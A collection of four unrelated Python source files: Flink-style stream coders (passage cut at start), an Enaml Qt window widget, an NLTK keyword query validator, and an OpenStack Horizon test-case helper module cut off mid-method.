decoded_list = [field_coder.decode_from_stream(stream, nested)
for field_coder in self._field_coders]
return (*decoded_list,)
def __repr__(self) -> str:
return 'TupleCoderImpl[%s]' % ', '.join(str(c) for c in self._field_coders)
class BinaryCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
out_stream.write_bigendian_int32(len(value))
out_stream.write(value, False)
def decode_from_stream(self, in_stream, nested):
size = in_stream.read_bigendian_int32()
return in_stream.read(size)
class CharCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
bytes_value = value.encode("utf-8")
out_stream.write_bigendian_int32(len(bytes_value))
out_stream.write(bytes_value, False)
def decode_from_stream(self, in_stream, nested):
size = in_stream.read_bigendian_int32()
return in_stream.read(size).decode("utf-8")
class DateCoderImpl(StreamCoderImpl):
EPOCH_ORDINAL = datetime.datetime(1970, 1, 1).toordinal()
def encode_to_stream(self, value, out_stream, nested):
out_stream.write_bigendian_int32(self.date_to_internal(value))
def decode_from_stream(self, in_stream, nested):
value = in_stream.read_bigendian_int32()
return self.internal_to_date(value)
def date_to_internal(self, d):
return d.toordinal() - self.EPOCH_ORDINAL
def internal_to_date(self, v):
return datetime.date.fromordinal(v + self.EPOCH_ORDINAL)
class TimeCoderImpl(StreamCoderImpl):
def encode_to_stream(self, value, out_stream, nested):
out_stream.write_bigendian_int32(self.time_to_internal(value))
def decode_from_stream(self, in_stream, nested):
value = in_stream.read_bigendian_int32()
return self.internal_to_time(value)
def time_to_internal(self, t):
milliseconds = (t.hour * 3600000
+ t.minute * 60000
+ t.second * 1000
+ t.microsecond // 1000)
return milliseconds
def internal_to_time(self, v):
seconds, milliseconds = divmod(v, 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
return datetime.time(hours, minutes, seconds, milliseconds * 1000)
class TimestampCoderImpl(StreamCoderImpl):
def __init__(self, precision):
self.precision = precision
def is_compact(self):
return self.precision <= 3
def encode_to_stream(self, value, out_stream, nested):
milliseconds, nanoseconds = self.timestamp_to_internal(value)
if self.is_compact():
assert nanoseconds == 0
out_stream.write_bigendian_int64(milliseconds)
else:
out_stream.write_bigendian_int64(milliseconds)
out_stream.write_bigendian_int32(nanoseconds)
def decode_from_stream(self, in_stream, nested):
if self.is_compact():
milliseconds = in_stream.read_bigendian_int64()
nanoseconds = 0
else:
milliseconds = in_stream.read_bigendian_int64()
nanoseconds = in_stream.read_bigendian_int32()
return self.internal_to_timestamp(milliseconds, nanoseconds)
def timestamp_to_internal(self, timestamp):
seconds = int(timestamp.replace(tzinfo=datetime.timezone.utc).timestamp())
microseconds_of_second = timestamp.microsecond
milliseconds = seconds * 1000 + microseconds_of_second // 1000
nanoseconds = microseconds_of_second % 1000 * 1000
return milliseconds, nanoseconds
def internal_to_timestamp(self, milliseconds, nanoseconds):
second, microsecond = (milliseconds // 1000,
milliseconds % 1000 * 1000 + nanoseconds // 1000)
return datetime.datetime.utcfromtimestamp(second).replace(microsecond=microsecond)
class LocalZonedTimestampCoderImpl(TimestampCoderImpl):
def __init__(self, precision, timezone):
super(LocalZonedTimestampCoderImpl, self).__init__(precision)
self.timezone = timezone
def internal_to_timestamp(self, milliseconds, nanoseconds):
return self.timezone.localize(
super(LocalZonedTimestampCoderImpl, self).internal_to_timestamp(
milliseconds, nanoseconds))
class ArrowCoderImpl(StreamCoderImpl):
def __init__(self, schema, row_type, timezone):
self._schema = schema
self._field_types = row_type.field_types()
self._timezone = timezone
self._resettable_io = ResettableIO()
self._batch_reader = ArrowCoderImpl._load_from_stream(self._resettable_io)
self.data_out_stream = create_OutputStream()
self._resettable_io.set_output_stream(self.data_out_stream)
def encode_to_stream(self, cols, out_stream, nested):
data_out_stream = self.data_out_stream
batch_writer = pa.RecordBatchStreamWriter(self._resettable_io, self._schema)
batch_writer.write_batch(
pandas_to_arrow(self._schema, self._timezone, self._field_types, cols))
out_stream.write_var_int64(data_out_stream.size())
out_stream.write(data_out_stream.get())
data_out_stream._clear()
def decode_from_stream(self, in_stream, nested):
while in_stream.size() > 0:
yield self._decode_one_batch_from_stream(in_stream, in_stream.read_var_int64())
@staticmethod
def _load_from_stream(stream):
while stream.readable():
reader = pa.ipc.open_stream(stream)
yield reader.read_next_batch()
def _decode_one_batch_from_stream(self, in_stream: create_InputStream, size: int) -> List:
self._resettable_io.set_input_bytes(in_stream.read(size))
# there is only one arrow batch in the underlying input stream
return arrow_to_pandas(self._timezone, self._field_types, [next(self._batch_reader)])
def __repr__(self):
return 'ArrowCoderImpl[%s]' % self._schema
class OverWindowArrowCoderImpl(StreamCoderImpl):
def __init__(self, arrow_coder):
self._arrow_coder = arrow_coder
self._int_coder = IntCoderImpl()
def encode_to_stream(self, value, stream, nested):
self._arrow_coder.encode_to_stream(value, stream, nested)
def decode_from_stream(self, in_stream, nested):
while in_stream.size():
remaining_size = in_stream.read_var_int64()
window_num = self._int_coder.decode_from_stream(in_stream, nested)
remaining_size -= 4
window_boundaries_and_arrow_data = []
for _ in range(window_num):
window_size = self._int_coder.decode_from_stream(in_stream, nested)
remaining_size -= 4
window_boundaries_and_arrow_data.append(
[self._int_coder.decode_from_stream(in_stream, nested)
for _ in range(window_size)])
remaining_size -= 4 * window_size
window_boundaries_and_arrow_data.append(
self._arrow_coder._decode_one_batch_from_stream(in_stream, remaining_size))
yield window_boundaries_and_arrow_data
def __repr__(self):
return 'OverWindowArrowCoderImpl[%s]' % self._arrow_coder
class PassThroughLengthPrefixCoderImpl(StreamCoderImpl):
def __init__(self, value_coder):
self._value_coder = value_coder
def encode_to_stream(self, value, out: create_OutputStream, nested: bool) -> Any:
self._value_coder.encode_to_stream(value, out, nested)
def decode_from_stream(self, in_stream: create_InputStream, nested: bool) -> Any:
return self._value_coder.decode_from_stream(in_stream, nested)
def get_estimated_size_and_observables(self, value: Any, nested=False):
return 0, []
def __repr__(self):
return 'PassThroughLengthPrefixCoderImpl[%s]' % self._value_coder
|
|
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Typed
from enaml.layout.geometry import Pos, Rect, Size
from enaml.widgets.window import ProxyWindow
from .QtCore import Qt, QPoint, QRect, QSize, Signal
from .QtGui import QApplication, QFrame, QLayout, QIcon
from .q_resource_helpers import get_cached_qicon
from .q_single_widget_layout import QSingleWidgetLayout
from .qt_container import QtContainer
from .qt_widget import QtWidget
MODALITY = {
'non_modal': Qt.NonModal,
'application_modal': Qt.ApplicationModal,
'window_modal': Qt.WindowModal,
}
class QWindowLayout(QSingleWidgetLayout):
""" A QSingleWidgetLayout subclass which adds support for windows
which explicitly set their minimum and maximum sizes.
"""
def minimumSize(self):
""" The minimum size for the layout area.
This is a reimplemented method which will return the explicit
minimum size of the window, if provided.
"""
parent = self.parentWidget()
if parent is not None:
size = parent.explicitMinimumSize()
if size.isValid():
return size
return super(QWindowLayout, self).minimumSize()
def maximumSize(self):
""" The maximum size for the layout area.
This is a reimplemented method which will return the explicit
maximum size of the window, if provided.
"""
parent = self.parentWidget()
if parent is not None:
size = parent.explicitMaximumSize()
if size.isValid():
return size
return super(QWindowLayout, self).maximumSize()
class QWindow(QFrame):
""" A custom QFrame which uses a QWindowLayout to manage its
central widget.
The window layout computes the min/max size of the window based
on its central widget, unless the user explicitly changes them.
"""
#: A signal emitted when the window is closed.
closed = Signal()
def __init__(self, parent=None):
""" Initialize a QWindow.
Parameters
----------
*args, **kwargs
The positional and keyword arguments needed to initialize
a QFrame.
"""
super(QWindow, self).__init__(parent, Qt.Window)
self._central_widget = None
self._expl_min_size = QSize()
self._expl_max_size = QSize()
layout = QWindowLayout()
layout.setSizeConstraint(QLayout.SetMinAndMaxSize)
self.setLayout(layout)
def closeEvent(self, event):
""" Handle the QCloseEvent from the window system.
By default, this handler calls the superclass' method to close
the window and then emits the 'closed' signal.
"""
super(QWindow, self).closeEvent(event)
self.closed.emit()
def centralWidget(self):
""" Returns the central widget for the window.
Returns
-------
result : QWidget or None
The central widget of the window, or None if no widget
was provided.
"""
return self._central_widget
def setCentralWidget(self, widget):
""" Set the central widget for this window.
Parameters
----------
widget : QWidget
The widget to use as the content of the window.
"""
self._central_widget = widget
self.layout().setWidget(widget)
def explicitMinimumSize(self):
""" Return the explicit minimum size for this widget.
Returns
-------
result : QSize
If the user has explitly set the minimum size of the
widget, that size will be returned. Otherwise, an
invalid QSize will be returned.
"""
return self._expl_min_size
def explicitMaximumSize(self):
""" Return the explicit maximum size for this widget.
Returns
-------
result : QSize
If the user has explitly set the maximum size of the
widget, that size will be returned. Otherwise, an
invalid QSize will be returned.
"""
return self._expl_max_size
def setMinimumSize(self, size):
""" Set the minimum size for the QWindow.
This is an overridden parent class method which stores the
provided size as the explictly set QSize. The explicit
size can be reset by passing a QSize of (0, 0).
Parameters
----------
size : QSize
The minimum size for the QWindow.
"""
super(QWindow, self).setMinimumSize(size)
if size == QSize(0, 0):
self._expl_min_size = QSize()
else:
self._expl_min_size = size
self.layout().update()
def setMaximumSize(self, size):
""" Set the maximum size for the QWindow.
This is an overridden parent class method which stores the
provided size as the explictly set QSize. The explicit
size can be reset by passing a QSize equal to the maximum
widget size of QSize(16777215, 16777215).
Parameters
----------
size : QSize
The maximum size for the QWindow.
"""
super(QWindow, self).setMaximumSize(size)
if size == QSize(16777215, 16777215):
self._expl_max_size = QSize()
else:
self._expl_max_size = size
self.layout().update()
class QtWindow(QtWidget, ProxyWindow):
""" A Qt implementation of an Enaml ProxyWindow.
"""
#: A reference to the toolkit widget created by the proxy.
widget = Typed(QWindow)
#--------------------------------------------------------------------------
# Initialization API
#--------------------------------------------------------------------------
def create_widget(self):
""" Create the QWindow widget.
"""
self.widget = QWindow(self.parent_widget())
def init_widget(self):
""" Initialize the widget.
"""
super(QtWindow, self).init_widget()
d = self.declaration
if d.title:
self.set_title(d.title)
if -1 not in d.initial_size:
self.widget.resize(*d.initial_size)
if -1 not in d.initial_position:
self.widget.move(*d.initial_position)
if d.modality != 'non_modal':
self.set_modality(d.modality)
if d.icon:
self.set_icon(d.icon)
self.widget.closed.connect(self.on_closed)
def init_layout(self):
""" Initialize the widget layout.
"""
super(QtWindow, self).init_layout()
self.widget.setCentralWidget(self.central_widget())
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def central_widget(self):
""" Find and return the central widget child for this widget.
Returns
-------
result : QWidget or None
The central widget defined for this widget, or None if one
is not defined.
"""
d = self.declaration.central_widget()
if d is not None:
return d.proxy.widget
def on_closed(self):
""" The signal handler for the 'closed' signal.
This method will fire the 'closed' event on the declaration.
"""
self.declaration._handle_close()
#--------------------------------------------------------------------------
# Child Events
#--------------------------------------------------------------------------
def child_added(self, child):
""" Handle the child added event for a QtWindow.
"""
super(QtWindow, self).child_added(child)
if isinstance(child, QtContainer):
self.widget.setCentralWidget(self.central_widget())
def child_removed(self, child):
""" Handle the child added event for a QtWindow.
"""
super(QtWindow, self).child_removed(child)
if isinstance(child, QtContainer):
self.widget.setCentralWidget(self.central_widget())
#--------------------------------------------------------------------------
# ProxyWindow API
#--------------------------------------------------------------------------
def set_title(self, title):
""" Set the title of the window.
"""
self.widget.setWindowTitle(title)
def set_modality(self, modality):
""" Set the modality of the window.
"""
self.widget.setWindowModality(MODALITY[modality])
def set_icon(self, icon):
""" Set the window icon.
"""
if icon:
qicon = get_cached_qicon(icon)
else:
qicon = QIcon()
self.widget.setWindowIcon(qicon)
def position(self):
""" Get the position of the of the window.
"""
point = self.widget.pos()
return Pos(point.x(), point.y())
def set_position(self, pos):
""" Set the position of the window.
"""
self.widget.move(*pos)
def size(self):
""" Get the size of the window.
"""
size = self.widget.size()
return Size(size.width(), size.height())
def set_size(self, size):
""" Set the size of the window.
"""
size = QSize(*size)
if size.isValid():
self.widget.resize(size)
def geometry(self):
""" Get the geometry of the window.
"""
rect = self.widget.geometry()
return Rect(rect.x(), rect.y(), rect.width(), rect.height())
def set_geometry(self, rect):
""" Set the geometry of the window.
"""
rect = QRect(*rect)
if rect.isValid():
self.widget.setGeometry(rect)
def frame_geometry(self):
""" Get the geometry of the window.
"""
rect = self.widget.frameGeometry()
return Rect(rect.x(), rect.y(), rect.width(), rect.height())
def maximize(self):
""" Maximize the window.
"""
self.widget.showMaximized()
def minimize(self):
""" Minimize the window.
"""
self.widget.showMinimized()
def restore(self):
""" Restore the window after a minimize or maximize.
"""
self.widget.showNormal()
def send_to_front(self):
""" Move the window to the top of the Z order.
"""
self.widget.raise_()
def send_to_back(self):
""" Move the window to the bottom of the Z order.
"""
self.widget.lower()
def center_on_screen(self):
""" Center the window on the screen.
"""
widget = self.widget
rect = QRect(QPoint(0, 0), widget.frameGeometry().size())
geo = QApplication.desktop().screenGeometry(widget)
widget.move(geo.center() - rect.center())
def center_on_widget(self, other):
""" Center the window on another widget.
"""
widget = self.widget
rect = QRect(QPoint(0, 0), widget.frameGeometry().size())
other_widget = other.proxy.widget
if other_widget.isWindow():
geo = other_widget.frameGeometry()
else:
size = other_widget.size()
point = other_widget.mapToGlobal(QPoint(0, 0))
geo = QRect(point, size)
widget.move(geo.center() - rect.center())
def close(self):
""" Close the window.
"""
self.widget.close()
|
|
# We use term extraction and clustering methods found in this paper http://nlg18.csie.ntu.edu.tw:8080/lwku/c12.pdf
import sys; import os
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('.'))
from nltk import pos_tag, word_tokenize
from nltk.corpus import stopwords
from Keywords_Wordnet.KeywordExtractor import *
import re
from Utils.DataSource import *
from Keywords_Wordnet.WordnetHelper import *
import json
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.stem.snowball import SnowballStemmer
class AbstractValidator:
"""
Abstact Validator: An interface for validators, which validate queries with articles
"""
def __init__(self):
"""
obligatory init
:return: nothing
"""
pass
def validate(self, query, article):
"""
All validators must have a validate method
:param Query: query to validate
:param Article: article used for validation
:return:
"""
assert False
class KeywordValidator(AbstractValidator):
"""
class KeywordValidator: Uses keywords from an article to validate a query
"""
def __init__(self):
"""
initializes query_article_lists, a list of list of articles defined around a query
:return: nothing
"""
self.query_article_lists = []
self.lemmatizer = WordNetLemmatizer()
def add_query(self, query):
"""
add_query: adds query to queries to be validated, inits empty query_article_list
:param query: query to add
:return: nothing
"""
query_article_list = QueryArticleList(query)
self.query_article_lists.append(query_article_list)
#TODO: WHAT DOES THIS DO
def add_to_query_article_list(self, article):
"""
adds to
:param article: article to add to queries
:return: list of queries article was added to
"""
queries_added_to = []
return queries_added_to
def get_query_article_lists(self):
"""
get_query_article_lists
:return: self.query_article_lists: list of list of articles defined around a query
"""
return self.query_article_lists
def validate(self, query_id, article_id):
"""
validate -- evaluates how much article validates query
:param query: query to validate
:param article: article to validate with
:return: match_percentage (relative measure of how well article validates query)
"""
max_match_value = 0
# Need to process query and article formats
ds = DataSource()
query_synonyms_raw = ds.get_query_synonyms(query_id) # [('and', 'CC', 'Random', []), ('julia', 'NN', 'Random', []), ('phuong', 'JJ', 'Random', []), ('test', 'NN', 'Random', ['trial', 'run', 'mental_test', 'test', 'tryout', 'trial_run', 'exam', 'examination', 'mental_testing', 'psychometric_test']), ('validator', 'NN', 'Random', [])]
query_synonyms = {}
for w in query_synonyms_raw:
query_synonyms[self.normalize_keyword(w[0])] = [self.normalize_keyword(synonym) for synonym in w[3]]
article_keyword = json.loads(ds.get_article_keywords(article_id)[0]) #{NN: [list of keywords], VB:[list of verb keywords]}
article_keywords_flat = set()
for pos in article_keyword:
for item in article_keyword[pos]:
article_keywords_flat.add(self.normalize_keyword(item[0]))
match_value = 0
# find matches
for query_word in query_synonyms:
max_match_value += 2
if query_word in article_keywords_flat:
match_value += 2
else:
for synonym in query_synonyms[query_word]:
if synonym in article_keywords_flat:
match_value += 1
break
match_percentage = 0 if max_match_value == 0 else (match_value / max_match_value)
return match_percentage
def normalize_keyword(self, word):
lemma = self.lemmatizer.lemmatize(word.lower())
stem = (SnowballStemmer("english").stem(lemma))
return stem
class Source:
"""
class Source -- source of an article
"""
def __init__(self, id, name, reliability):
"""
creates a source object
:param id: number to uniquify source
:param name: name of source, ex CNN
:param reliability: how reliable a source is -- default is 1.0
:return: nothing
"""
self.id = id
self.name = name
self.reliability = reliability
def get_ID(self):
"""
:return: source id
"""
return self.id
def get_name(self):
"""
:return: source name
"""
return self.name
def get_reliability(self):
"""
:return: source reliability
"""
return self.reliability
def load_from_SQL(self, id):
"""
loads source from database
:param id: source id
:return: source object
"""
return
class Article:
"""
Article class
"""
def __init__(self, title, body, url, source):
"""
creates an article object
:param title: article title
:param body: tagged article body title and text
:param url: article url
:param source: article source
:return: nothing
"""
pattern = re.compile(r'TITLE:(.*)TEXT:(.*)', re.DOTALL)
tagged_items = re.match(pattern, body)
self.title_tagged = tagged_items.group(1)
self.body_tagged = tagged_items.group(2)
self.title = title
self.url = url
self.source = source
def extract_keyword(self):
"""
extracts keywords from text
:return: keywords extracted
"""
extractor = KeywordExtractor()
self.keyword = extractor.extract_keywords(self)
return self.keyword
def get_keyword(self):
"""
returns None if keywords not yet extracted
:return: keywords
"""
return self.keyword
def is_linked_to(self, other_article):
"""
determines if an article is linked to another article
:param other_article: article to check against
:return: True if semantically related
"""
return False
def get_title(self):
"""
:return: article title
"""
return self.title
class QueryElement:
"""
Query element class -- A part of a query and its role, synonyms, and words in hierarchies
ex. Beyonce as the subject
"""
def __init__(self, role, word):
"""
creates a QueryElement object
:param role: role of element, ex. Subject
:param word: word itself, ex Beyonce
:return: nothing
"""
self.role = role
self.word = word
self.synonyms = self.get_synonyms()
self.hierarchies = self.get_hierarchies()
def get_synonyms(self):
"""
:return: synonyms of query element
"""
return []
def get_hierarchies(self):
"""
:return: words in query element's hierarchy, ex America is a hierarchy for Ohio
"""
return []
class Query:
"""
Query class -- for the query a user submits
"""
def __init__(self, id, query_parts, threshold):
"""
creates a query object
:param id: query id from database
:param query_parts: parts of query -- subject, verb, etc.
:param threshold: how well an article must match query to validate it
:return: nothing
"""
self.threshold = threshold
self.id = id
self.subject = QueryElement("subject", query_parts["subject"])
self.verb = QueryElement("verb", query_parts["verb"])
self.direct_obj = QueryElement("direct_obj", query_parts["direct_obj"])
self.indirect_obj = QueryElement("indirect_obj", query_parts["indirect_obj"])
self.location = QueryElement("location", query_parts["location"])
self.query = query_parts["query"]
stoplist_file = open(KeywordExtractor.stoplist_file)
self.stop_list = set(stoplist_file.readlines())
stoplist_file.close()
self.query_tagged = self.tag_query() # [('Beyonce', 'NN'), ('releases', 'NNS'), ('song', 'NN')]
self.synonyms_with_tag = {} # {'NNS': {'releases': []}, 'NN': {'Beyonce': [], 'song': []}}
self.generate_synonyms_with_tag()
def get_id(self):
"""
:return: query id
"""
return self.id
def tag_query(self):
"""
part of speech tags a query
:return: the tagged form of the query
"""
return pos_tag(word_tokenize(self.query))
def generate_synonyms_with_tag(self):
"""
generates synonyms for each word in the query, using only synonyms with same part of speech
:return:
"""
for tagged_word in self.query_tagged:
if tagged_word[0].lower() not in self.stop_list: # tagged_word[0] = word
if tagged_word[1] not in self.synonyms_with_tag: # tagged_word[1] = tag
self.synonyms_with_tag[tagged_word[1]] = {}
self.synonyms_with_tag[tagged_word[1]][tagged_word[0]] = get_synonyms(tagged_word[0],tagged_word[1])
# TODO actually get synonyms
print(self.synonyms_with_tag)
def get_synonyms(self):
"""
:return: synonyms with their tags of the words in the query
"""
return self.synonyms_with_tag
def get_threshold(self):
"""
:return: query's threshold -- how well an article must match query to validate it
"""
return self.threshold
def get_elements(self):
"""
:return: elements of query: subject, verb, direct object, indirect object, location
(only subject and verb are guaranteed to not be None)
"""
return self.subject, self.verb, self.direct_obj, self.indirect_obj, self.location
class QueryArticleList:
"""
class QueryArticleList -- a query, and a list of articles defined around it
"""
def __init__(self, query):
"""
inits an article list around a query
:param query: the query to add articles to a list for
:return: nothing
"""
self.query = query
self.articles = []
def add_article(self, article):
"""
adds an article to a query article list
:param article: article to add
:return: Nothing
"""
self.articles.append(article)
def get_num_articles(self):
"""
gets number of articles in query article list
:return: number of articles in query article list
"""
return len(self.articles)
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import copy
from functools import wraps # noqa
import os
from ceilometerclient.v2 import client as ceilometer_client
from cinderclient import client as cinder_client
from django.conf import settings
from django.contrib.messages.storage import default_storage # noqa
from django.core.handlers import wsgi
from django.core import urlresolvers
from django.test.client import RequestFactory # noqa
from django.test import utils as django_test_utils
from django.utils.importlib import import_module # noqa
from django.utils import unittest
import glanceclient
from heatclient import client as heat_client
import httplib2
from keystoneclient.v2_0 import client as keystone_client
import mock
import mox
from neutronclient.v2_0 import client as neutron_client
from novaclient.v1_1 import client as nova_client
from openstack_auth import user
from openstack_auth import utils
from saharaclient import client as sahara_client
from swiftclient import client as swift_client
from troveclient import client as trove_client
from horizon import base
from horizon import conf
from horizon.test import helpers as horizon_helpers
from openstack_dashboard import api
from openstack_dashboard import context_processors
from openstack_dashboard.test.test_data import utils as test_utils
# Makes output of failing mox tests much easier to read.
wsgi.WSGIRequest.__repr__ = lambda self: "<class 'django.http.HttpRequest'>"
def create_stubs(stubs_to_create={}):
"""decorator to simplify setting up multiple stubs at once via mox
:param stubs_to_create: methods to stub in one or more modules
:type stubs_to_create: dict
The keys are python paths to the module containing the methods to mock.
To mock a method in openstack_dashboard/api/nova.py, the key is::
api.nova
The values are either a tuple of list of methods to mock in the module
indicated by the key.
For example::
('server_list',)
-or-
('flavor_list', 'server_list',)
-or-
['flavor_list', 'server_list']
Additionally, multiple modules can be mocked at once::
{
api.nova: ('flavor_list', 'server_list'),
api.glance: ('image_list_detailed',),
}
"""
if not isinstance(stubs_to_create, dict):
raise TypeError("create_stub must be passed a dict, but a %s was "
"given." % type(stubs_to_create).__name__)
def inner_stub_out(fn):
@wraps(fn)
def instance_stub_out(self, *args, **kwargs):
for key in stubs_to_create:
if not (isinstance(stubs_to_create[key], tuple) or
isinstance(stubs_to_create[key], list)):
raise TypeError("The values of the create_stub "
"dict must be lists or tuples, but "
"is a %s."
% type(stubs_to_create[key]).__name__)
for value in stubs_to_create[key]:
self.mox.StubOutWithMock(key, value)
return fn(self, *args, **kwargs)
return instance_stub_out
return inner_stub_out
class RequestFactoryWithMessages(RequestFactory):
def get(self, *args, **kwargs):
req = super(RequestFactoryWithMessages, self).get(*args, **kwargs)
req.user = utils.get_user(req)
req.session = []
req._messages = default_storage(req)
return req
def post(self, *args, **kwargs):
req = super(RequestFactoryWithMessages, self).post(*args, **kwargs)
req.user = utils.get_user(req)
req.session = []
req._messages = default_storage(req)
return req
@unittest.skipIf(os.environ.get('SKIP_UNITTESTS', False),
"The SKIP_UNITTESTS env variable is set.")
class TestCase(horizon_helpers.TestCase):
"""Specialized base test case class for Horizon.
It gives access to numerous additional features:
* A full suite of test data through various attached objects and
managers (e.g. ``self.servers``, ``self.user``, etc.). See the
docs for
:class:`~openstack_dashboard.test.test_data.utils.TestData`
for more information.
* The ``mox`` mocking framework via ``self.mox``.
* A set of request context data via ``self.context``.
* A ``RequestFactory`` class which supports Django's ``contrib.messages``
framework via ``self.factory``.
* A ready-to-go request object via ``self.request``.
* The ability to override specific time data controls for easier testing.
* Several handy additional assertion methods.
"""
def setUp(self):
def fake_conn_request(*args, **kwargs):
raise Exception("An external URI request tried to escape through "
"an httplib2 client. Args: %s, kwargs: %s"
% (args, kwargs))
self._real_conn_request = httplib2.Http._conn_request
httplib2.Http._conn_request = fake_conn_request
self._real_context_processor = context_processors.openstack
context_processors.openstack = lambda request: self.context
self.patchers = {}
self.add_panel_mocks()
super(TestCase, self).setUp()
def _setup_test_data(self):
super(TestCase, self)._setup_test_data()
test_utils.load_test_data(self)
self.context = {'authorized_tenants': self.tenants.list()}
def _setup_factory(self):
# For some magical reason we need a copy of this here.
self.factory = RequestFactoryWithMessages()
def _setup_user(self):
self._real_get_user = utils.get_user
tenants = self.context['authorized_tenants']
self.setActiveUser(id=self.user.id,
token=self.token,
username=self.user.name,
domain_id=self.domain.id,
tenant_id=self.tenant.id,
service_catalog=self.service_catalog,
authorized_tenants=tenants)
def _setup_request(self):
super(TestCase, self)._setup_request()
self.request.session['token'] = self.token.id
def add_panel_mocks(self):
"""Global mocks on panels that get called on all views."""
self.patchers['aggregates'] = mock.patch(
'openstack_dashboard.dashboards.admin'
'.aggregates.panel.Aggregates.can_access',
mock.Mock(return_value=True))
self.patchers['aggregates'].start()
def tearDown(self):
httplib2.Http._conn_request = self._real_conn_request
context_processors.openstack = self._real_context_processor
utils.get_user = self._real_get_user
mock.patch.stopall()
super(TestCase, self).tearDown()
def setActiveUser(self, id=None, token=None, username=None, tenant_id=None,
service_catalog=None, tenant_name=None, roles=None,
authorized_tenants=None, enabled=True, domain_id=None):
def get_user(request):
return user.User(id=id,
token=token,
user=username,
domain_id=domain_id,
tenant_id=tenant_id,
service_catalog=service_catalog,
roles=roles,
enabled=enabled,
authorized_tenants=authorized_tenants,
endpoint=settings.OPENSTACK_KEYSTONE_URL)
utils.get_user = get_user
def assertRedirectsNoFollow(self, response, expected_url):
"""Check for redirect.
Asserts that the given response issued a 302 redirect without
processing the view which is redirected to.
"""
assert (response.status_code / 100 == 3), \
"The response did not return a redirect."
self.assertEqual(response._headers.get('location', None),
('Location', settings.TESTSERVER + expected_url))
self.assertEqual(response.status_code, 302)
def assertNoFormErrors(self, response, context_name="form"):
"""Checks for no form errors.
Asserts that the response either does not contain a form in its
context, or that if it does, that form has no errors.
"""
context = getattr(response, "context", {})
if not context or context_name not in context:
return True
errors = response.context[context_name]._errors
assert len(errors) == 0, \
"Unexpected errors were found on the form: %s" % errors
def assertFormErrors(self, response, count=0, message=None,
context_name="form"):
"""Check for form errors.
Asserts that the response does contain a form in its
context, and that form has errors, if count were given,
it must match the exact numbers of errors
"""
context = getattr(response, "context", {})
assert (context and context_name in context), \
"The response did not contain a form."
errors = response.context[context_name]._errors
if count:
assert len(errors) == count, \
"%d errors were found on the form, %d expected" % \
(len(errors), count)
if message and message not in unicode(errors):
self.fail("Expected message not found, instead found: %s"
% ["%s: %s" % (key, [e for e in field_errors]) for
(key, field_errors) in errors.items()])
else:
assert len(errors) > 0, "No errors were found on the form"
class BaseAdminViewTests(TestCase):
"""Sets an active user with the "admin" role.
For testing admin-only views and functionality.
"""
def setActiveUser(self, *args, **kwargs):
if "roles" not in kwargs:
kwargs['roles'] = [self.roles.admin._info]
super(BaseAdminViewTests, self).setActiveUser(*args, **kwargs)
def setSessionValues(self, **kwargs):
settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
engine = import_module(settings.SESSION_ENGINE)
store = engine.SessionStore()
for key in kwargs:
store[key] = kwargs[key]
self.request.session[key] = kwargs[key]
store.save()
self.session = store
self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key
class APITestCase(TestCase):
"""Testing APIs.
For use with tests which deal with the underlying clients rather than
stubbing out the openstack_dashboard.api.* methods.
"""
def setUp(self):
super(APITestCase, self).setUp()
utils.patch_middleware_get_user()
def fake_keystoneclient(request, admin=False):
"""Returns the stub keystoneclient.
Only necessary because the function takes too many arguments to
conveniently be a lambda.
"""
return self.stub_keystoneclient()
# Store the original clients
self._original_glanceclient = api.glance.glanceclient
self._original_keystoneclient = api.keystone.keystoneclient
self._original_novaclient = api.nova.novaclient
self._original_neutronclient = api.neutron.neutronclient
self._original_cinderclient = api.cinder.cinderclient
self._original_heatclient = api.heat.heatclient
self._original_ceilometerclient = api.ceilometer.ceilometerclient
self._original_troveclient = api.trove.troveclient
self._original_saharaclient = api.sahara.client
# Replace the clients with our stubs.
api.glance.glanceclient = lambda request: self.stub_glanceclient()
api.keystone.keystoneclient = fake_keystoneclient
api.nova.novaclient = lambda request: self.stub_novaclient()
api.neutron.neutronclient = lambda request: self.stub_neutronclient()
api.cinder.cinderclient = lambda request: self.stub_cinderclient()
api.heat.heatclient = (lambda request, password=None:
self.stub_heatclient())
api.ceilometer.ceilometerclient = (lambda request:
self.stub_ceilometerclient())
api.trove.troveclient = lambda request: self.stub_troveclient()
api.sahara.client = lambda request: self.stub_saharaclient()
def tearDown(self):
super(APITestCase, self).tearDown()
api.glance.glanceclient = self._original_glanceclient
api.nova.novaclient = self._original_novaclient
api.keystone.keystoneclient = self._original_keystoneclient
api.neutron.neutronclient = self._original_neutronclient
api.cinder.cinderclient = self._original_cinderclient
api.heat.heatclient = self._original_heatclient
api.ceilometer.ceilometerclient = self._original_ceilometerclient
api.trove.troveclient = self._original_troveclient
api.sahara.client = self._original_saharaclient
def stub_novaclient(self):
if not hasattr(self, "novaclient"):
self.mox.StubOutWithMock(nova_client, 'Client')
self.novaclient = self.mox.CreateMock(nova_client.Client)
return self.novaclient
def stub_cinderclient(self):
if not hasattr(self, "cinderclient"):
self.mox.StubOutWithMock(cinder_client, 'Client')
self.cinderclient = self.mox.CreateMock(cinder_client.Client)
return self.cinderclient
def stub_keystoneclient(self):
if not hasattr(self, "keystoneclient"):
self.mox.StubOutWithMock(keystone_client, 'Client')
# NOTE(saschpe): Mock properties, MockObject.__init__ ignores them:
keystone_client.Client.auth_token = 'foo'
keystone_client.Client.service_catalog = None
keystone_client.Client.tenant_id = '1'
